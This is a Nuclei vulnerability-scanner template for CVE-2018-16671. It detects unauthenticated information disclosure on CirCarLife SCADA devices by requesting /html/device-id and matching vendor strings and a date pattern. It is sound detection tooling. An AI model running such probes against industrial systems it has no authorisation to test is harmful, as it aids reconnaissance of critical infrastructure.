nuclei-templates/cves/2018/CVE-2018-16671.yaml

31 lines
709 B
YAML

id: CVE-2018-16671
info:
name: CirCarLife SCADA Device ID
description: System software information disclosure due to lack of authentication
reference:
- https://www.exploit-db.com/exploits/45384
author: geeknik
severity: medium
tags: cve,cve2018,circarlife,scada,iot,disclosure
requests:
- method: GET
path:
- "{{BaseURL}}/html/device-id"
matchers-condition: and
matchers:
- type: word
part: header
words:
- "CirCarLife Scada"
- type: word
part: body
words:
- "circontrol"
- type: regex
part: body
regex:
- "(19|20)\\d\\d[- /.](0[1-9]|1[012])[- /.](0[1-9]|[12][0-9]|3[01])"